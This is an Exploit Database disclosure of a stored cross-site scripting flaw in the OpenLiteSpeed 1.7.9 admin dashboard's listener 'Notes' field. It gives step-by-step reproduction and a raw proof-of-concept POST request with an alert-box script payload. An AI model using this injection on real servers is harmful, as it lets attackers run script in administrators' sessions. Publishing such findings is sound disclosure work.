Openlitespeed 1.7.9 – ‘Notes’ Stored Cross-Site Scripting

• Exploit Database
• 43 阅读

• 作者： cmOs
  日期： 2021-03-30
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49727/

• # Exploit Title: Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting
  # Date: 3/30/2021
  # Exploit Author: cmOs
  # Vendor Homepage: https://openlitespeed.org/
  # Software Link: https://openlitespeed.org/kb/install-from-binary/
  # Version: 1.7.9
  # Tested on Ubuntu 20.04
  
  Step 1: Log in to the dashboard using the Administrator account
  Step 2: Go to Listeners > Summary > Actions (View) > Edit
  Step 3: Inject XSS_Payload to "Notes" parameter
  Step 4: Graceful Restart
  Step 5: Trigger XSS when Administrator click on Default Icon
  
  [POC]
  
  POST /view/confMgr.php HTTP/1.1
  Host: 127.0.0.1:7080
  Connection: close
  Content-Length: 163
  sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
  Accept: text/html, */*; q=0.01
  X-Requested-With: XMLHttpRequest
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
  Gecko) Chrome/89.0.4389.90 Safari/537.36
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  Origin: https://127.0.0.1:7080
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Referer: https://127.0.0.1:7080/index.php
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Cookie: LSUI37FE0C43B84483E0=325275ee1caf0c970c4ae7960d30f0a6;
  litespeed_admin_lang=english; LSID37FE0C43B84483E0=kWLbCk%2F0XX0%3D;
  LSPA37FE0C43B84483E0=I%2Fpkx%2FeQg4s%3D
  
  name=Default&ip=ANY&port=8088&reusePort=&secure=0&note=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&a=s&m=sl_Default&p=lg&t=L_GENERAL&r=Default&tk=0.04356800+1617073257